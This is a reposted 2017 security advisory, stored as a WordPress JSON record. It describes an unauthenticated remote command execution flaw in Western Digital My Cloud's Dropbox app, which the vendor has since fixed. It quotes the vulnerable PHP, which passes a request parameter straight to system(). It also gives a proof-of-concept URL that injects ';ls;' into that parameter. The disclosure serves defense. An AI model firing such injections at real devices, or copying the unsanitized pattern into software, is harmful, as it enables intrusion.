{"id":9009,"date":"2017-08-30T14:19:06","date_gmt":"2017-08-30T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/08\/30\/news-2782\/"},"modified":"2017-08-30T14:19:06","modified_gmt":"2017-08-30T22:19:06","slug":"news-2782","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/08\/30\/news-2782\/","title":{"rendered":"SSD Advisory \u2013 Remote Command Execution in Western Digital with Dropbox App"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 30 Aug 2017 02:39:13 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3397\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3397');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability summary<\/strong><br \/> The following advisory describes an unauthenticated Remote Command Execution vulnerability in My Cloud products with that has Dropbox App installed.<\/p>\n<p>The My Passport, My Book, and My Cloud (Single-Bay) drives allow users to backup their data to an existing Dropbox account using WD SmartWare Pro, WD Backup. The My Cloud Dropbox App (Available on the multi-bay My Cloud drives) allows a user to sign-in to their Dropbox account and synchronize the data stored between the drive and Dropbox storage.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Western Digital was informed of the vulnerability, and released Dropbox v2.00 to address it.<\/p>\n<p><span id=\"more-3397\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><\/p>\n<p>User controlled input is not sufficiently sanitized, and then passed to a <em>system()<\/em> function. The attacker controlled input <em>$_REQUEST[&#8216;account&#8217;]<\/em> found in <em>dropbox.php<\/em> can be exploited to gain remote command execution.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739da7125c909528637\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;?php    $date = new DateTime();  $r    = $date-&gt;getTimestamp();    $cmd        = $_REQUEST[&#8216;cmd&#8217;];  $DropboxAPI = new DropboxAPI;    switch ($cmd) {      case &#8220;delBlacklist&#8221;:          $DropboxAPI-&gt;delBlacklist();          break;      case &#8220;getBlacklist&#8221;:          $DropboxAPI-&gt;getBlacklist();          break;      case &#8220;setBlacklist&#8221;:          $DropboxAPI-&gt;setBlacklist();          break;      case &#8220;getTree&#8221;:          $DropboxAPI-&gt;getTree();          break;  }  &#8230;  &#8230;  &#8230;  &#8230;  class DropboxAPI  {      public function getBlacklist()      {          $account = $_REQUEST[&#8216;account&#8217;];          $xmlPath = &#8220;\/tmp\/dBlack_$account.xml&#8221;;                    @unlink($xmlPath);                    $cmd = &#8220;dropnasctl -j $account &#8211;black_list_get -x $xmlPath &gt;\/dev\/null&#8221;;          system($cmd);                    if (file_exists($xmlPath)) {              print file_get_contents($xmlPath);          } else {              print &#8220;&lt;config&gt;&lt;list&gt;&lt;\/list&gt;&lt;\/config&gt;&#8221;;          }      }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0068 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>The following PoC will run the &#8216;<em>ls<\/em>&#8216; command on victim&#8217;s machine<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59a739da7126c495176824\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/Dropbox\/php\/dropbox.php?cmd=getBlacklist&amp;account=;ls;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59a739da7126c495176824-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59a739da7126c495176824-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/IP\/Dropbox\/php\/dropbox.php?cmd=getBlacklist&amp;account=;ls;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3397\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 30 Aug 2017 02:39:13 +0000<\/strong><\/p>\n<p>Vulnerability summary The following advisory describes an unauthenticated Remote Command Execution vulnerability in My Cloud products with that has Dropbox App installed. The My Passport, My Book, and My Cloud (Single-Bay) drives allow users to backup their data to an existing Dropbox account using WD SmartWare Pro, WD Backup. The My Cloud Dropbox App (Available &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3397\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Remote Command Execution in Western Digital with Dropbox App<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757,12136],"class_list":["post-9009","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9009","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9009"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9009\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9009"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9009"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}